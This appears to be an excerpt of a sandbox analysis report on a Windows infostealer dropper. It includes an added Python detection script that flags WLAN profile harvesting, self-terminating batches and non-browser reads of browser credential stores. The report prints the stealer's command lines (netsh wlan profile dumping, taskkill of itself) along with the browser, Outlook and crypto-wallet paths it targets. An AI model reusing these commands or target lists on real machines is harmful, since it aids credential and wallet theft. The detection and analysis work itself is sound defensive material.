Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr All
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /F /PID 4828
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout /T 2 /NOBREAK
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /F /PID 4828
Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00446124
Source: LKxcbzlwkz.exe, 00000000.00000002.3001298517.0000000003D3E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager#
Source: LKxcbzlwkz.exe, 00000000.00000002.3001298517.0000000003D3E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
Source: LKxcbzlwkz.exe | Binary or memory string: Shell_TrayWnd
Source: LKxcbzlwkz.exe, 00000000.00000002.3001298517.0000000003D3E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerA
Source: LKxcbzlwkz.exe, 00000000.00000002.3001298517.0000000003D3E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager,
Source: LKxcbzlwkz.exe, 00000000.00000002.3001298517.0000000003D3E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
Source: LKxcbzlwkz.exe, 00000000.00000002.3001298517.0000000003D3E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager6
Source: LKxcbzlwkz.exe, 00000000.00000002.3001298517.0000000003D3E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerR
Source: LKxcbzlwkz.exe, 00000000.00000002.3001298517.0000000003D3E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager^
Source: LKxcbzlwkz.exe | Binary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning

Language, Device and Operating System Detection

Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\aut66E4.tmp, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe, type: DROPPED
Source: C:\Windows\SysWOW64\openfiles.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\JOUNLV.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\netstandard\v4.0_2.0.0.0__cc7b13ffcd2ddd51\netstandard.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\netsh.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,0_2_004720DB
Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_00472C3F GetUserNameW,0_2_00472C3F
Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,0_2_0041E364
Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: LKxcbzlwkz.exe, 00000000.00000002.3001223376.0000000003CDB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: fpavserver.exe
Source: LKxcbzlwkz.exe, 00000000.00000002.3001223376.0000000003CDB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: bdss.exe
Source: LKxcbzlwkz.exe, 00000000.00000002.3001248236.0000000003CFE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: sbamtray.exe
Source: LKxcbzlwkz.exe, 00000000.00000002.3001223376.0000000003CDB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: avgnt.exe
Source: JOUNLV.exe, 00000001.00000002.2021806149.000001BB5071C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: rogramFiles%\Windows Defender\MsMpeng.exe
Source: JOUNLV.exe, 00000001.00000002.2021068454.000001BB505A7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: LKxcbzlwkz.exe, 00000000.00000002.3001223376.0000000003CDB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: savservice.exe
Source: LKxcbzlwkz.exe, 00000000.00000002.3001248236.0000000003CFE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ufseagnt.exe
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Source: Yara match | File source: Process Memory Space: LKxcbzlwkz.exe PID: 4924, type: MEMORYSTR
Source: Yara match | File source: 1.0.JOUNLV.exe.1bb35cc0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.2015535093.000001BB384E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2015535093.000001BB37EFD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2015535093.000001BB38567000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.1763580624.000001BB35CC2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: LKxcbzlwkz.exe PID: 4924, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: JOUNLV.exe PID: 4828, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH.zip, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\aut66E4.tmp, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe, type: DROPPED
Source: Yara match | File source: 00000001.00000002.2015535093.000001BB37EFD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: JOUNLV.exe PID: 4828, type: MEMORYSTR
Source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Electrum!Electrum\wallets
Source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: bytecoinJaxxicom.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37EFD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: 3C:\Users\user\AppData\Roaming\Exodus\exodus.wallet2y
Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37EFD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: 0C:\Users\user\AppData\Roaming\Ethereum\keystore2y
Source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Exodus)Exodus\exodus.wallet
Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37EFD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: &C:\Users\user\AppData\Roaming\Binance2y
Source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Ethereum#Ethereum\keystore
Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37EFD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: 4C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets2y
Source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Ethereum#Ethereum\keystore
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: LKxcbzlwkz.exe, 00000000.00000002.3001223376.0000000003CDB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: WIN_8.}
Source: LKxcbzlwkz.exe | Binary or memory string: WIN_XP
Source: LKxcbzlwkz.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
Source: LKxcbzlwkz.exe, 00000000.00000002.3001223376.0000000003CDB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: x|Microsoft Office Click-to-Run|x|user|WIN_8|X64|No|No|On|ddd|x|betah@Wj
Source: LKxcbzlwkz.exe | Binary or memory string: WIN_XPe
Source: LKxcbzlwkz.exe, 00000000.00000002.3001223376.0000000003CDB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: x|Microsoft Office Click-to-Run|x|user|WIN_8|X64|No|No|On|ddd|x|beta
Source: LKxcbzlwkz.exe, 00000000.00000002.3001298517.0000000003D3E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: crosoft Office Click-to-Run|x|user|WIN_8|X64|No|No|On|ddd|x|beta75F00373208B7DF0037B24C745
Source: LKxcbzlwkz.exe | Binary or memory string: WIN_VISTA
Source: LKxcbzlwkz.exe, 00000000.00000002.3001223376.0000000003CDB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: x|Microsoft Office Click-to-Run|x|user|WIN_8|X64|No|No|On|ddd|x|betaP@
Source: LKxcbzlwkz.exe, 00000000.00000002.3001248236.0000000003CFE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: x|Microsoft Office Click-to-Run|x|user|WIN_8|X64|No|No|On|ddd|r
Source: LKxcbzlwkz.exe, 00000000.00000002.3001223376.0000000003CDB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: WIN_7
Source: LKxcbzlwkz.exe | Binary or memory string: WIN_8
Source: LKxcbzlwkz.exe, 00000000.00000002.3001223376.0000000003CDB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: x|Microsoft Office Click-to-Run|x|user|WIN_8|X64|No|No|On|ddd|x|betaJ@uj
Source: LKxcbzlwkz.exe, 00000000.00000002.3001223376.0000000003CDB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: x|Microsoft Office Click-to-Run|x|user|WIN_8|X64|No|No|On|ddd|x|betav@Aj
Source: Yara match | File source: 1.0.JOUNLV.exe.1bb35cc0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2015535093.000001BB37EFD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.1763580624.000001BB35CC2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: LKxcbzlwkz.exe PID: 4924, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: JOUNLV.exe PID: 4828, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\aut66E4.tmp, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe, type: DROPPED
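The process tree recorded under "HIPS / PFW / Operating System Protection Evasion" and the file opens listed in this section give a detection engineer three concrete patterns to hunt for: netsh.exe enumerating WLAN profiles on behalf of a process living in a user-writable directory, a dropped batch file that uses taskkill to terminate its own parent, and browser credential stores (Login Data, Web Data, cookies.sqlite, places.sqlite, History) being opened by something other than a browser. The following is an added example of that detection logic, not code from the Joe Sandbox report or from the sample. The event records are constructed to mirror the report's process creations and file opens; the record shape (pid, ppid, image, cmdline, path) is an assumed Sysmon/EDR-style feed, and every PID other than the report's 4924 and 4828 is invented. It also generalises slightly beyond the report by carrying a benign control chain (an interactive netsh under explorer.exe and Chrome reading its own store) that must not alert.

```python
"""Detection logic for three behaviours in this report: WLAN profile harvesting via
netsh, a batch that kills its own parent, and browser credential stores read by a
non-browser. Added example, not code from the report or the sample; the telemetry
below is constructed and its record shape (pid/ppid/image/cmdline/path) is an
assumed Sysmon/EDR-style feed rather than a real product schema."""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple, Union


@dataclass(frozen=True)
class ProcEvent:  # process creation, Sysmon Event ID 1 shape (assumed)
    pid: int
    ppid: int
    image: str
    cmdline: str


@dataclass(frozen=True)
class FileOpenEvent:  # file open by a running process, EDR-style (assumed)
    pid: int
    path: str


Event = Union[ProcEvent, FileOpenEvent]
Finding = Tuple[str, int, str]  # (rule name, offending pid, attributed image)

# Constructed sample mirroring the report. PIDs 4924/4828 are the report's; the rest are invented.
MALICIOUS_CHAIN: List[Event] = [
    ProcEvent(4924, 1200, r"C:\Users\user\Desktop\LKxcbzlwkz.exe", r'"C:\Users\user\Desktop\LKxcbzlwkz.exe"'),
    ProcEvent(4828, 4924, r"C:\Users\user\AppData\Local\Temp\JOUNLV.exe", r'"C:\Users\user\AppData\Local\Temp\JOUNLV.exe"'),
    ProcEvent(5100, 4828, r"C:\Windows\System32\cmd.exe", '"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All'),
    ProcEvent(5104, 5100, r"C:\Windows\System32\chcp.com", "chcp 65001"),
    ProcEvent(5108, 5100, r"C:\Windows\System32\netsh.exe", "netsh wlan show profile"),
    ProcEvent(5112, 5100, r"C:\Windows\System32\findstr.exe", "findstr All"),
    ProcEvent(5120, 4828, r"C:\Windows\System32\cmd.exe", '"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid'),
    ProcEvent(5124, 5120, r"C:\Windows\System32\netsh.exe", "netsh wlan show networks mode=bssid"),
    ProcEvent(5200, 4828, r"C:\Windows\System32\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\deec1b5f-97cf-494d-80f2-5e4fb7cf93cd.bat"'),
    ProcEvent(5204, 5200, r"C:\Windows\System32\taskkill.exe", "taskkill /F /PID 4828"),
    ProcEvent(5208, 5200, r"C:\Windows\System32\timeout.exe", "timeout /T 2 /NOBREAK"),
    FileOpenEvent(4828, r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    FileOpenEvent(4828, r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite"),
]
# Benign control (constructed): an admin runs netsh interactively; Chrome reads its own store.
BENIGN_CONTROL: List[Event] = [
    ProcEvent(6000, 1000, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(6004, 6000, r"C:\Windows\System32\cmd.exe", '"cmd.exe"'),
    ProcEvent(6008, 6004, r"C:\Windows\System32\netsh.exe", "netsh wlan show profile"),
    ProcEvent(6100, 6000, r"C:\Program Files\Google\Chrome\Application\chrome.exe", "chrome.exe"),
    FileOpenEvent(6100, r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
]
SAMPLE_EVENTS: List[Event] = MALICIOUS_CHAIN + BENIGN_CONTROL

# `netsh wlan show profile` lists saved SSIDs as "All User Profile : <SSID>" lines,
# which is what the sample's `findstr All` keeps.
WLAN_PROFILE_RE = re.compile(r"\bwlan\s+show\s+profiles?\b", re.I)
TASKKILL_PID_RE = re.compile(r"\btaskkill\b.*?/pid\s+(\d+)", re.I)
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\downloads\\", "\\programdata\\")
CREDENTIAL_STORES = ("\\login data", "\\web data", "\\history",
                     "\\cookies.sqlite", "\\places.sqlite", "\\key4.db", "\\logins.json")
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe", "opera.exe"}


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def _ancestors(ev: ProcEvent, by_pid: Dict[int, ProcEvent], depth: int = 4) -> List[ProcEvent]:
    """Parent chain of `ev`, nearest first, stopping at PIDs the feed never saw."""
    chain: List[ProcEvent] = []
    cur = ev
    for _ in range(depth):
        parent = by_pid.get(cur.ppid)
        if parent is None:
            break
        chain.append(parent)
        cur = parent
    return chain


def detect(events: List[Event]) -> List[Finding]:
    by_pid = {e.pid: e for e in events if isinstance(e, ProcEvent)}
    findings: List[Finding] = []
    for ev in events:
        if isinstance(ev, FileOpenEvent):
            proc = by_pid.get(ev.pid)
            # Rule 3: browser credential/history store opened by a process that is not a browser.
            if proc and _basename(proc.image) not in BROWSERS and ev.path.lower().endswith(CREDENTIAL_STORES):
                findings.append(("browser_store_read", ev.pid, proc.image))
            continue
        name = _basename(ev.image)
        # Rule 1: WLAN profile enumeration whose ancestry passes through a user-writable path.
        if name == "netsh.exe" and WLAN_PROFILE_RE.search(ev.cmdline):
            origin = next((a for a in _ancestors(ev, by_pid)
                           if any(m in a.image.lower() for m in USER_WRITABLE)), None)
            if origin is not None:
                findings.append(("wlan_profile_harvest", ev.pid, origin.image))
        # Rule 2: taskkill aimed at one of its own ancestors (batch-driven self-termination).
        elif name == "taskkill.exe":
            m = TASKKILL_PID_RE.search(ev.cmdline)
            if m and any(a.pid == int(m.group(1)) for a in _ancestors(ev, by_pid)):
                findings.append(("self_terminating_batch", ev.pid, by_pid[int(m.group(1))].image))
    return findings


if __name__ == "__main__":
    for rule, pid, image in detect(SAMPLE_EVENTS):
        print(f"{rule:24} pid={pid:<5} {image}")
```

Run stand-alone it reports four findings, all attributed to JOUNLV.exe (one WLAN harvest via PID 5108, one self-kill via PID 5204, two credential store reads), and nothing for the benign control. Rule 1 deliberately keys on the ancestor's location rather than on `findstr All` or `chcp 65001`, both of which are trivially dropped by the attacker; the `netsh wlan show networks mode=bssid` call is left unflagged because it reveals nearby SSIDs, not stored credentials.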

Remote Access Functionality

Source: Yara match | File source: Process Memory Space: LKxcbzlwkz.exe PID: 4924, type: MEMORYSTR
Source: Yara match | File source: 1.0.JOUNLV.exe.1bb35cc0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.2015535093.000001BB384E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2015535093.000001BB37EFD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2015535093.000001BB38567000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.1763580624.000001BB35CC2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: LKxcbzlwkz.exe PID: 4924, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: JOUNLV.exe PID: 4828, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH.zip, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\aut66E4.tmp, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe, type: DROPPED
Source: Yara match | File source: 00000001.00000002.2015535093.000001BB37EFD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: JOUNLV.exe PID: 4828, type: MEMORYSTR
Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0046CEF3
Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_004652BE
Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476619
MITRE ATT&CK matrix, techniques listed by tactic (a leading number is the count displayed next to that technique in the report's matrix):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances

Resource Development: 1 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains

Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools

Execution: 131 Windows Management Instrumentation; 11 Native API; 1 Scheduled Task/Job; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript

Persistence: 1 Scripting; 1 DLL Side-Loading; 2 Valid Accounts; 1 Scheduled Task/Job; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd

Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 12 Process Injection; 1 Scheduled Task/Job; Startup Items; Scheduled Task/Job; At; Cron; Launchd

Defense Evasion: 121 Disable or Modify Tools; 11 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 Software Packing; 1 Timestomp; 1 DLL Side-Loading; 1 Masquerading; 2 Valid Accounts; 261 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 12 Process Injection

Credential Access: 1 OS Credential Dumping; 221 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture

Discovery: 2 System Time Discovery; 1 Account Discovery; 2 File and Directory Discovery; 138 System Information Discovery; 1 Query Registry; 361 Security Software Discovery; 261 Virtualization/Sandbox Evasion; 3 Process Discovery; 11 Application Window Discovery; 1 System Owner/User Discovery; 1 System Network Configuration Discovery

Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools

Collection: 11 Archive Collected Data; 2 Data from Local System; 1 Screen Capture; 1 Email Collection; 221 Input Capture; 4 Clipboard Data; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging

Command and Control: 1 Web Service; 2 Ingress Tool Transfer; 11 Encrypted Channel; 3 Non-Application Layer Protocol; 14 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols

